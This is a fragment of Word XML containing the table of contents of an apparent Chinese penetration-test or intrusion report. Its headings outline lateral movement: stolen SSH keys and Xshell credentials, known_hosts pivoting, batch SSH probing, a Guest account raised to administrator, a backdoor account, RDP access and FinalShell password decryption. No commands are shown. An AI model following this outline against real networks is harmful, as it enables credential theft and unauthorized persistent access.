        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>个人画像（翻资料</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获得doc/xls/pdf/ppt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc25925 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>32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_Toc18849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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>扩展肉鸡</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取xshell凭证</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc18849 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>33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_Toc4820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24.16.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ssh 连接端口为62222</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4820 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>34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_Toc19093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24.16.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 连接成功：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc19093 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>34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_Toc18103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24.16.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看.ssh/下的文件：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc18103 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>34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_Toc4047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24.16.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用目标私钥和公钥文件登录</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4047 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>34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_Toc17663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24.16.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 私钥成功登录</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc17663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_Toc4514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24.16.5.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Mobaxterm利用私钥登录</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4514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_Toc6103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24.16.5.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用肉鸡:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,登录10.88.17.9</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc6103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_Toc2764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24.16.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看 known_hosts文件：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2764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_Toc9571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24.16.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>尝试登录known_hosts文件里的主机：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc9571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_Toc11946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24.16.7.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.88.17.8成功登录</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc11946 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>35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_Toc11613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24.16.7.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 成功登录</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc11613 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>36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_Toc12447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24.16.7.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 成功登录</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc12447 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>36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_Toc31737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24.16.8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>批量ssh探测（指定用户名和密码）：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc31737 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>37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_Toc24830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24.16.8.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/24网段</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc24830 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>37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_Toc18787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24.16.8.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：25个</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc18787 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>37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_Toc17347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24.16.8.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Known_hosts里的主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（128个）</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc17347 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>38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_Toc3112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24.16.8.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：2个</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc3112 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>41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_Toc21981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24.17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不是系统权限也能远程VNC</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc21981 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>41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_Toc29630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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>激活Guest用户加入管理员组</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc29630 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>42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_Toc15884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24.18.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>激活Guest用户</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc15884 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>42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_Toc29830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24.18.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加入Guest用户至管理员组</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc29830 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>42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_Toc19802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24.18.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现不在管理员组内</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc19802 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>43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_Toc22726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24.18.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>再次通过【3389桌面】激活Guest用户</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc22726 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>43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_Toc5306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24.18.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看管理员用户，成功加入</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc5306 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>44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_Toc9824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24.18.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成功登录：用户名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mxxhxxbxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-PC\Guest 密码：空（直接回车）</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc9824 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>44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_Toc16476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24.19 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>创建新账户后门：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc16476 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>44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_Toc26450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24.19.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>net user查看用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>创建成功</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc26450 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>45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_Toc11937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24.19.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3389远程桌面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>连接成功</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc11937 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>45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_Toc4942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24.20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上传everything工具</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4942 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>45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_Toc10216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24.21 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>扩展肉鸡：发现FinalShell3.0.10 shell管理工具，存在5台服务器可直接连接</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc10216 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>45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_Toc2788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24.21.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>密码解密</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2788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_Toc1415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24.21.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>找文件：finalshell/conn/ 获取保存的密码</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1415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_Toc22795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24.21.1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>提取保存的密码</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc22795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_Toc18851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24.21.1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>找解密代码：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc18851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_Toc22048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24.21.1.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>其中：替换成待解密的密码</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc22048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_Toc30414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</w:rPr>
        <w:t xml:space="preserve">24.21.1.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>编译执行</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc30414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_Toc24452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24.21.1.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获得密码：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc24452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_Toc11666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24.21.1.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成果：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc11666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_Toc12675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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>密码猜测：</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc12675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_Toc1875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24.21.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pass.txt</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
